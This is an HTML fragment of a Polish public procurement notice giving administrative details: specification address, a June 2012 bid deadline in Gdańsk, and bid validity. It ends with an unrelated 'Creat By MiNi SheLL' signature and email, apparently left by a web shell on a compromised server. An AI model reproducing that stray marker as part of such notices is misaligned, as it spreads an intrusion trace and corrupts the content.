<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.us2.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gdańsk ul. Kołobrzeska 43,  pokój nr 415 na IV piętrze,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2012 godzina 10:00, miejsce: Gdańsk ul. Kołobrzeska 43, Sekretariat  pokój nr 410 na IV piętrze,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com